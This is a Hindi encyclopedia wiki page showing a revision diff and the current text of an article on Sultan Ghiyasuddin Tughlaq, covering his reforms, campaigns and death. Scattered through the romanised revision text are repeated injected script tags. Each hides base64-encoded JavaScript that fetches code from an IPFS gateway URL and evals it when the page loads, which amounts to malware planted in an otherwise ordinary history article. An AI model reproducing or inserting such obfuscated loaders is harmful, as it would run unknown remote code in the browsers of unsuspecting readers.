Difference between revisions of "ग़यासुद्दीन तुग़लक़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कानून" to "क़ानून")
m (Text replacement - "अर्थात " to "अर्थात् ")
 
(21 intermediate revisions by 7 users not shown)
Line 1: Line 1:
गयासुद्दीन तुग़लक [[दिल्ली]] का सुल्तान (1320-25 ई.) था। उसने [[तुग़लक वंश]] की स्थापना की थी। उसका पिता सुल्तान बलबन (1266-86) का तुर्क ग़ुलाम था। सुल्तान ने उसे ग़ुलामी से मुक्त कर दिया था। और उसने एक जाट स्त्री से विवाह किया। उसके लड़के गयासुद्दीन का आरंभिक नाम गाजी मलिक था, जो अपने गुणों और वीरता के कारण सुल्तान [[अलाउद्दीन ख़िलजी]] (1296-1316 ई.) के द्वारा उच्च पदों पर नियुक्त किया गया। उसने मंगोलों के आक्रमण से कई बार उत्तर-पश्चिमी सीमा की रक्षा की। [[ख़िलजी वंश]] के अंतिम शासक [[मुबारक]] को मारकर (1320 ई.) गद्दी पर बैठने वाले सरदार ख़ुसरो को भी गयासुद्दीन ने पराजित किया। तदन्तर अमीरों ने गयासुद्दीन को ही गद्दी पर बैठा दिया। उसने तुग़लक वंश की स्थापना की। गद्दी पर बैठने के बाद उसने केवल 5 वर्ष शासन किया लेकिन अपने अल्पकालीन शासन में ही दिल्ली के सुल्तानों की सैनिक शक्ति को पुनर्गठित किया। [[वारंगल]] के काकतीय राजा प्रताप रुद्रदेव द्वितीय को पराजित किया, और [[अखण्डित बंगाल|बंगाल]] के विद्रोही [[हाकिम गयासुद्दीन बहादुर]] को हराया। इसके अलावा उसने गैरक़ानूनी भूमि अनुदानों को छीन कर, योग्य और ईमानदार हाकिमों को नियुक्त करके, लगान वसूली में मनमानी बंद करके, कृषि को प्रोत्साहित कर, सिंचाई के साधन प्रस्तुत कर, न्याय एवं पुलिस-व्यवस्था में सुधार करके, ग़रीबों के लिए सहायता की व्यवस्था करके, तथा डाक-व्यवस्था को विकसित करके राज्य व्यवस्था को आदर्श रूप दिया। उसने विद्वानों का भी संरक्षण किया, जिनमें [[अमीर ख़ुसरो]] मुख्य था। एक दुर्घटना के कारण गयासुद्दीन के शासन का अंत हो गया, जिसके लिए कुछ इतिहासकारों ने उसके पुत्र जूना ख़ाँ को ही जिम्मेदार बताया है, जो बाद में [[मुहम्मद बिन तुग़लक]] के नाम से गद्दी पर बैठा।
+
{{बहुविकल्प|बहुविकल्पी शब्द=तुग़लक़|लेख का नाम=तुग़लक़}}
 +
[[चित्र:The-Tomb-Of-Ghayasuddin-Tughlak.jpg|thumb|300px|ग़यासुद्दीन तुग़लक़ का मक़बरा, [[तुग़लकाबाद]]]]
 +
'''ग़ाज़ी मलिक''' या '''तुग़लक़ ग़ाज़ी''', '''ग़यासुद्दीन तुग़लक़''' (1320-1325 ई.) के नाम से 8 सितम्बर, 1320 को [[दिल्ली]] के सिंहासन पर बैठा। इसे [[तुग़लक़ वंश]] का संस्थापक भी माना जाता है। इसने कुल 29 बार [[मंगोल]] आक्रमण को विफल किया। सुल्तान बनने से पहले वह [[क़ुतुबुद्दीन मुबारक ख़िलजी]] के शासन काल में उत्तर-पश्चिमी सीमान्त प्रान्त का शक्तिशाली गर्वनर नियुक्त हुआ था। वह [[दिल्ली सल्तनत]] का पहला सुल्तान था, जिसने अपने नाम के साथ 'ग़ाज़ी' (काफ़िरों का वध करने वाला) शब्द जोड़ा था।
 +
==आर्थिक सुधार==
 +
{{tocright}}
 +
'''सुल्तान ने आर्थिक सुधार के अन्तर्गत''' अपनी आर्थिक नीति का आधार संयम, सख्ती एवं नरमी के मध्य संतुलन (रस्म-ए-मियान) को बनाया। उसने लगान के रूप में उपज का 1/10 या 1/12 हिस्सा ही लेने का आदेश जारी कराया। ग़यासुद्दीन ने मध्यवर्ती ज़मीदारों विशेष रूप से मुकद्दम तथा खूतों को उनके पुराने अधिकार लौटा दिए, जिससे उनको वही स्थिति प्राप्त हो गयी, जो [[बलबन]] के समय में प्राप्त थी। ग़यासुद्दीन ने अमीरों की भूमि पुनः लौटा दी। उसने सिंचाई के लिए कुँए एवं नहरों का निर्माण करवाया। सम्भवतः नहर का निर्माण करवाने वाला ग़यासुद्दीन प्रथम सुल्तान था। [[अलाउद्दीन ख़िलजी]] की कठोर नीति के विरुद्ध उसने उदारता की नीति अपनायी, जिसे बरनी ने 'रस्मेमियान' अथवा 'मध्यपंथी नीति' कहा है।
 +
==उदार व्यक्ति==
 +
'''ग़यासुद्दीन तुग़लक़ की डाक व्यवस्था''' श्रेष्ठ थी। न्याय व्यवस्था के अन्तर्गत ग़यासुद्दीन ने एक न्याय विभाग का निर्माण करवाया। उसमें धार्मिक सहिष्णुता का अभाव था। उसने अलाउद्दीन ख़िलजी द्वारा चलाई गयी दाग़ने तथा चेहरा प्रथा को प्रभावी तरीक़े से लागू किया। वह दानी स्वभाव का होने के साथ जनकल्याणकारी कार्यों को कराने में दिलचस्पी रखता था। बरनी के अनुसार सुल्तान अपने सैनिकों के साथ पुत्रवत व्यवहार करता था। उसकी सेना में गिज, तुर्क, [[मंगोल]], रूमी, ताजिक, खुरासानी, मेवाती एवं दोआब के [[राजपूत]] सैनिक शामिल थे। उसकी महत्त्वपूर्ण विजय निम्नलिखित थीं-<br />
 +
# [[वारंगल]] व तेलंगाना की विजय (1324 ई.)
 +
# तिरहुती विजय, मंगोल विजय (1324 ई.) आदि।
 +
 
 +
==विजय अभियान==
 +
{| class="bharattable-green" border="1" style="margin:5px; float:right"
 +
|+ तुग़लक़ वंश
 +
! शासक
 +
! काल
 +
|-
 +
| ग़यासुद्दीन तुग़लक़
 +
| 1320-1325 ई.
 +
|-
 +
| [[मुहम्मद बिन तुग़लक़]]
 +
| 1325-1351 ई.
 +
|-
 +
| [[फ़िरोज शाह तुग़लक़]]
 +
| 1351-1388 ई.
 +
|-
 +
| [[ग़यासुद्दीन तुग़लक़ द्वितीय]]
 +
| 1389 ई.
 +
|-
 +
| [[अबूबक्र]]
 +
| 1389-1390 ई.
 +
|-
 +
| [[नासिरुद्दीन महमूदशाह]]
 +
| 1390-1394 ई.
 +
|-
 +
| [[नसरत शाह तुग़लक़]]
 +
| 1395-1398 ई.
 +
|-
 +
| [[महमूद तुग़लक़]]
 +
| 1399-1413 ई.
 +
|-
 +
|}
 +
 
 +
'''1321 ई. में ग़यासुद्दीन ने वारंगल पर''' आक्रमण किया, किन्तु वहाँ के [[काकतीय वंश|काकतीय]] राजा प्रताप रुद्रदेव को पराजित करने में वह असफल रहा। 1323 ई. में द्वितीय अभियान के अन्तर्गत ग़यासुद्दीन तुग़लक़ ने शाहज़ादे 'जौना ख़ाँ' ([[मुहम्मद बिन तुग़लक़]]) को दक्षिण [[भारत]] में सल्तनत के प्रभुत्व की पुन:स्थापना के लिए भेजा। जौना ख़ाँ ने वारंगल के काकतीय एवं [[मदुरा]] के [[पाण्ड्य साम्राज्य|पाण्ड्य]] राज्यों को विजित कर [[दिल्ली सल्तनत]] में शामिल कर लिया। इस प्रकार सर्वप्रथम ग़यासुद्दीन के समय में ही दक्षिण के राज्यों को दिल्ली सल्तनत में मिलाया गया। इन राज्यों में सर्वप्रथम वारंगल था। ग़यासुद्दीन तुग़लक़ पूर्णतः साम्राज्यवादी था। इसने अलाउद्दीन ख़िलजी की दक्षिण नीति त्यागकर दक्षिणी राज्यों को दिल्ली सल्तनत में शामिल कर लिया।
 +
 
 +
'''ग़यासुद्दीन जब''' [[बंगाल]] में था, तभी सूचना मिली कि, जूना ख़ाँ (मुहम्मद बिन तुग़लक़) निज़ामुद्दीन औलिया का शिष्य बन गया है और वह उसे राजा होने की भविष्यवाणी कर रहा है। निज़ामुद्दीन औलिया को ग़यासुद्दीन तुग़लक़ ने धमकी दी तो, औलिया ने उत्तर दिया कि, "हुनूज [[दिल्ली]] दूर अस्त, अर्थात् दिल्ली अभी बहुत दूर है। [[हिन्दू]] जनता के प्रति ग़यासुद्दीन तुग़लक़ की नीति कठोर थी। ग़यासुद्दीन तुग़लक़ [[संगीत]] का घोर विरोधी था। बरनी के अनुसार [[अलाउद्दीन ख़िलजी]] ने शासन स्थापित करने के लिये जहाँ रक्तपात व अत्याचार की नीति अपनाई, वहीं ग़यासुद्दीन ने चार वर्षों में ही उसे बिना किसी कठोरता के संभव बनाया।
 +
 
 +
==राजस्व सुधार==
 +
'''अपनी सत्ता स्थापित करने के बाद''' ग़यासुद्दीन तुग़लक़ ने अमीरों तथा जनता को प्रोत्साहित किया। शुद्ध रूप से तुर्की मूल का होने के कारण इस कार्य में उसे कोई विशेष कठिनाई नहीं हुई। ग़यासुद्दीन ने [[कृषि]] को प्रोत्साहन देने के लिए किसानों के हितों की ओर ध्यान दिया। उसने एक वर्ष में इक्ता के राजस्व में 1/10 से 1/11 भाग से अधिक की वृद्धि नहीं करने का आदेश दिया। उसने सिंचाई के लिए नहरें खुदवायीं तथा बाग़ बनवायें।
 +
==सार्वजनिक सुधार==
 +
'''जनता की सुविधा के लिए''' अपने शासन काल में ग़यासुद्दीन ने क़िलों, पुलों और नहरों का निर्माण कराया। सल्तनत काल में डाक व्यवस्था को सुदृढ़ करने का श्रेय ग़यासुद्दीन तुग़लक़ को ही जाता है। ‘बरनी’ ने डाक-व्यवस्था का विस्तृत वर्णन किया है। शारीरिक यातना द्वारा राजकीय ऋण वसूली को उसने प्रतिबंधित कर दिया, लेकिन [[हिन्दू]] जनता के प्रति उसकी कठोर नीति यथावत बनी रही। उसने हिन्दुओं का धन जमा करने की आज्ञा का निषेध किया।
 +
==धार्मिक कार्य==
 +
'''ग़यासुद्दीन एक कट्टर''' [[सुन्नी]] [[मुसलमान]] था। [[इस्लाम धर्म]] में उसकी गहरी आस्था और उसके सिद्धान्तों का वह सावधानीपूर्वक पालन करता था। उसने मुसलमान जनता पर इस्लाम के नियमों का पालन करने के लिए दबाव डाला। उसने अन्य धर्मों के प्रति भी सहिष्णुता की नीति अपनाई थी।
 +
 
 +
==निर्माण कार्य==
 +
'''स्थापत्य कला के क्षेत्र में''' ग़यासुद्दीन ने विशेष रूप में रुचि ली। अपने शसन काल में उसने तुग़लक़ाबाद नामक एक दुर्ग की नींव रखी।
 +
==मृत्यु==
 +
'''जब ग़यासुद्दीन तुग़लक़''' [[बंगाल]] अभियान से लौट रहा था, तब लौटते समय तुग़लक़ाबाद से 8 किलोमीटर की दूरी पर स्थित अफ़ग़ानपुर में एक महल (जिसे उसके लड़के जूना ख़ाँ के निर्देश पर अहमद अयाज ने लकड़ियों से निर्मित करवाया था) में सुल्तान ग़यासुद्दीन के प्रवेश करते ही वह महल गिर गया, जिसमें दबकर उसकी मार्च, 1325 ई. को मुत्यृ हो गयी। इस घटना के समय शेख रुकनुद्दीन महल में मौजूद था, जिसे उलूग ख़ाँ ने नमाज़ पढ़ने के बहाने उस स्थान से हटा दिया था। ग़यासुद्दीन तुग़लक़ का मक़बरा तुग़लक़ाबाद में स्थित है।
 +
 
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{दिल्ली सल्तनत}}
 
{{दिल्ली सल्तनत}}
[[Category:तुग़लक़ वंश]][[Category:दिल्ली सल्तनत]][[Category:इतिहास कोश]]__INDEX__
+
{{तुग़लक़ वंश}}
 +
[[Category:तुग़लक़ वंश]]
 +
[[Category:दिल्ली सल्तनत]]
 +
[[Category:इतिहास कोश]]
 +
__INDEX__

Latest revision as of 07:59, 7 November 2017

chitr:Disamb2.jpg tugalaq ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- tugalaq

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

[[chitr:The-Tomb-Of-Ghayasuddin-Tughlak.jpg|thumb|300px|gayasuddin tugalaq ka maqabara, tugalakabad]] gazi malik ya tugalaq gazi, gayasuddin tugalaq (1320-1325 ee.) ke nam se 8 sitambar, 1320 ko dilli ke sianhasan par baitha. ise tugalaq vansh ka sansthapak bhi mana jata hai. isane kul 29 bar mangol akraman ko viphal kiya. sultan banane se pahale vah qutubuddin mubarak khilaji ke shasan kal mean uttar-pashchimi simant prant ka shaktishali garvanar niyukt hua tha. vah dilli saltanat ka pahala sultan tha, jisane apane nam ke sath 'gazi' (kafiroan ka vadh karane vala) shabd jo da tha.

arthik sudhar

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sultan ne arthik sudhar ke antargat apani arthik niti ka adhar sanyam, sakhti evan narami ke madhy santulan (rasm-e-miyan) ko banaya. usane lagan ke roop mean upaj ka 1/10 ya 1/12 hissa hi lene ka adesh jari karaya. gayasuddin ne madhyavarti zamidaroan vishesh roop se mukaddam tatha khootoan ko unake purane adhikar lauta die, jisase unako vahi sthiti prapt ho gayi, jo balaban ke samay mean prapt thi. gayasuddin ne amiroan ki bhoomi punah lauta di. usane sianchaee ke lie kuane evan naharoan ka nirman karavaya. sambhavatah nahar ka nirman karavane vala gayasuddin pratham sultan tha. alauddin khilaji ki kathor niti ke viruddh usane udarata ki niti apanayi, jise barani ne 'rasmemiyan' athava 'madhyapanthi niti' kaha hai.

udar vyakti

gayasuddin tugalaq ki dak vyavastha shreshth thi. nyay vyavastha ke antargat gayasuddin ne ek nyay vibhag ka nirman karavaya. usamean dharmik sahishnuta ka abhav tha. usane alauddin khilaji dvara chalaee gayi dagane tatha chehara pratha ko prabhavi tariqe se lagoo kiya. vah dani svabhav ka hone ke sath janakalyanakari karyoan ko karane mean dilachaspi rakhata tha. barani ke anusar sultan apane sainikoan ke sath putravat vyavahar karata tha. usaki sena mean gij, turk, mangol, roomi, tajik, khurasani, mevati evan doab ke rajapoot sainik shamil the. usaki mahattvapoorn vijay nimnalikhit thian-

  1. varangal v telangana ki vijay (1324 ee.)
  2. tirahuti vijay, mangol vijay (1324 ee.) adi.

vijay abhiyan

tugalaq vansh
shasak kal
gayasuddin tugalaq 1320-1325 ee.
muhammad bin tugalaq 1325-1351 ee.
firoj shah tugalaq 1351-1388 ee.
gayasuddin tugalaq dvitiy 1389 ee.
aboobakr 1389-1390 ee.
nasiruddin mahamoodashah 1390-1394 ee.
nasarat shah tugalaq 1395-1398 ee.
mahamood tugalaq 1399-1413 ee.

1321 ee. mean gayasuddin ne varangal par akraman kiya, kintu vahaan ke kakatiy raja pratap rudradev ko parajit karane mean vah asaphal raha. 1323 ee. mean dvitiy abhiyan ke antargat gayasuddin tugalaq ne shahazade 'jauna khaan' (muhammad bin tugalaq) ko dakshin bharat mean saltanat ke prabhutv ki pun:sthapana ke lie bheja. jauna khaan ne varangal ke kakatiy evan madura ke pandy rajyoan ko vijit kar dilli saltanat mean shamil kar liya. is prakar sarvapratham gayasuddin ke samay mean hi dakshin ke rajyoan ko dilli saltanat mean milaya gaya. in rajyoan mean sarvapratham varangal tha. gayasuddin tugalaq poornatah samrajyavadi tha. isane alauddin khilaji ki dakshin niti tyagakar dakshini rajyoan ko dilli saltanat mean shamil kar liya.

gayasuddin jab bangal mean tha, tabhi soochana mili ki, joona khaan (muhammad bin tugalaq) nizamuddin auliya ka shishy ban gaya hai aur vah use raja hone ki bhavishyavani kar raha hai. nizamuddin auliya ko gayasuddin tugalaq ne dhamaki di to, auliya ne uttar diya ki, "hunooj dilli door ast, arthath dilli abhi bahut door hai. hindoo janata ke prati gayasuddin tugalaq ki niti kathor thi. gayasuddin tugalaq sangit ka ghor virodhi tha. barani ke anusar alauddin khilaji ne shasan sthapit karane ke liye jahaan raktapat v atyachar ki niti apanaee, vahian gayasuddin ne char varshoan mean hi use bina kisi kathorata ke sanbhav banaya.

rajasv sudhar

apani satta sthapit karane ke bad gayasuddin tugalaq ne amiroan tatha janata ko protsahit kiya. shuddh roop se turki mool ka hone ke karan is kary mean use koee vishesh kathinaee nahian huee. gayasuddin ne krishi ko protsahan dene ke lie kisanoan ke hitoan ki or dhyan diya. usane ek varsh mean ikta ke rajasv mean 1/10 se 1/11 bhag se adhik ki vriddhi nahian karane ka adesh diya. usane sianchaee ke lie naharean khudavayian tatha bag banavayean.

sarvajanik sudhar

janata ki suvidha ke lie apane shasan kal mean gayasuddin ne qiloan, puloan aur naharoan ka nirman karaya. saltanat kal mean dak vyavastha ko sudridh karane ka shrey gayasuddin tugalaq ko hi jata hai. ‘barani’ ne dak-vyavastha ka vistrit varnan kiya hai. sharirik yatana dvara rajakiy rrin vasooli ko usane pratibandhit kar diya, lekin hindoo janata ke prati usaki kathor niti yathavat bani rahi. usane hinduoan ka dhan jama karane ki ajna ka nishedh kiya.

dharmik kary

gayasuddin ek kattar sunni musalaman tha. islam dharm mean usaki gahari astha aur usake siddhantoan ka vah savadhanipoorvak palan karata tha. usane musalaman janata par islam ke niyamoan ka palan karane ke lie dabav dala. usane any dharmoan ke prati bhi sahishnuta ki niti apanaee thi.

nirman kary

sthapaty kala ke kshetr mean gayasuddin ne vishesh roop mean ruchi li. apane shasan kal mean usane tugalaqabad namak ek durg ki nianv rakhi.

mrityu

jab gayasuddin tugalaq bangal abhiyan se laut raha tha, tab lautate samay tugalaqabad se 8 kilomitar ki doori par sthit afaganapur mean ek mahal (jise usake l dake joona khaan ke nirdesh par ahamad ayaj ne lak diyoan se nirmit karavaya tha) mean sultan gayasuddin ke pravesh karate hi vah mahal gir gaya, jisamean dabakar usaki march, 1325 ee. ko mutyri ho gayi. is ghatana ke samay shekh rukanuddin mahal mean maujood tha, jise uloog khaan ne namaz padhane ke bahane us sthan se hata diya tha. gayasuddin tugalaq ka maqabara tugalaqabad mean sthit hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>